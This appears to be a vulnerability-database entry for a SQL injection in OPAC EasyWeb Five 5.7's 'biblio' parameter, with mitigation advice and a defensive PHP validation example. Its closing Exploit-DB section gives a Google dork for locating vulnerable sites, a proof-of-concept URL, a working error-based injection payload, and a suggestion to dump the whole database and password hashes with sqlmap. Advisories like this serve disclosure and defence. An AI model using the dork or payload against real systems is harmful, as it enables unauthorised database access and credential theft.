Vendor: OPAC EasyWeb Five
By: Dino Barlattani
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: OPAC EasyWeb Five
Affected Version From: 5.7
Affected Version To: 5.7
Patch Exists: NO
Related CWE: N/A
CPE: a:nexusfi:opac_easyweb_five:5.7
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: PHP
2018

OPAC EasyWeb Five 5.7 – ‘biblio’ SQL Injection

A SQL injection vulnerability exists in OPAC EasyWeb Five 5.7. An attacker can inject SQL through the vulnerable 'biblio' parameter of the 'index.php' script and execute arbitrary SQL commands against the back-end database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Sanitize all user input to ensure that it conforms to the expected format, using whitelists to define all allowed inputs.
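
The mitigation above as an added example (hypothetical PHP, not OPAC EasyWeb Five source code and not from the advisory author): an allowlist check on `biblio` followed by a bound parameter, which goes one step beyond the validation the page recommends. The code format `[A-Z0-9]{2,12}` is assumed from the sample value `RT10AH`; the `libraries` table, its columns and the function names are invented for illustration.

```php
<?php
declare(strict_types=1);

// Assumption: valid library codes resemble the page's sample "RT10AH".
const BIBLIO_PATTERN = '/\A[A-Z0-9]{2,12}\z/';

// Allowlist check: returns the code unchanged, or null if it must be rejected.
function validBiblio(mixed $raw): ?string
{
    // Arrays (biblio[]=x) and anything outside the pattern are refused outright.
    if (!is_string($raw) || preg_match(BIBLIO_PATTERN, $raw) !== 1) {
        return null;
    }
    return $raw;
}

// Hypothetical lookup; the placeholder keeps the value out of the SQL text
// even if the validation pattern is loosened later.
function findLibrary(PDO $db, string $biblio): ?array
{
    $stmt = $db->prepare('SELECT code, name FROM libraries WHERE code = :code');
    $stmt->execute([':code' => $biblio]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed in-memory database so the example runs offline.
$db = new PDO('sqlite::memory:');
// Exceptions belong in server-side logs. Never echo database error text to
// the client: the payload on this page reads data out of error messages.
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE libraries (code TEXT PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO libraries VALUES ('RT10AH', 'Sample library')");

// Constructed inputs: a well-formed code, a quote-bearing value, an array.
$samples = ['RT10AH', "RT10AH' AND 'x'='x", ['RT10AH']];
foreach ($samples as $raw) {
    $biblio = validBiblio($raw);
    if ($biblio === null) {
        // A real handler would send HTTP 400 and log the rejected request.
        echo 'rejected: ', json_encode($raw), PHP_EOL;
        continue;
    }
    $row = findLibrary($db, $biblio);
    echo 'accepted: ', $biblio, ' -> ', $row['name'] ?? 'not found', PHP_EOL;
}
```

Rejected values are also a useful detection signal: a `biblio` value containing quotes or spaces never comes from normal use of the catalogue.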

Exploit-DB raw data:

# Exploit Title: OPAC EasyWeb Five 5.7 - 'biblio' SQL Injection
# Dork: inurl:"index.php?scelta=campi"
# Date: 2018-10-02
# Exploit Author: Dino Barlattani
# Vendor Homepage: http://www.nexusfi.it/
# Software Link: http://www.nexusfi.it/easyweb.php
# Version: 5.7
# Category: Webapps
# Platform: PHP
# CVE: N/A

# POC:
# http://(server ip)/easyweb/w2001/index.php?scelta=campi&&biblio=RT10AH[SQL]&lang=

# You can use sqlmap to dump the entire database and the hashes

scelta=campi&&biblio=RT10AH' AND ROW(3677,8383)>(SELECT
COUNT(*),CONCAT(0x7176627a71,(SELECT
(ELT(3677=3677,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM (SELECT 8278 UNION
SELECT 2746 UNION SELECT 1668 UNION SELECT 1526)a GROUP BY x) AND
'CrYc'='CrYc&lang=